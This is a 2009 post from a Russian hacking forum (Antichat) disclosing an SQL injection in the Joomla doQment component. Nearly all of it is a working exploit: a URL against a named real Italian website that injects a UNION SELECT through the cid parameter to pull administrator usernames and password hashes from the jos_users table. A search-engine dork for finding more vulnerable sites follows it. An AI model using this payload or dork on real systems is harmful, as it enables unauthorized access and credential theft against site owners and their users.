08.07.2009, 15:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
SQL-Injection в компоненте doQment под joomla
SQL-Injection в компоненте doQment под joomla
Vulnerability : уязвимый параметр cid=
Example:
Код:
http://www.agmodena.it/index.php?option=com_doqment&cid=-11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users/**/where/**/usertype=CHAR(83,117,112,101,114,32,65,100,109,105 ,110,105,115,116,114,97,116,111,114)#&Itemid=92
Dork: inurl:com_doqment + cid=
# shell_c0de
Последний раз редактировалось shell_c0de; 08.07.2009 в 15:53..
|
|
|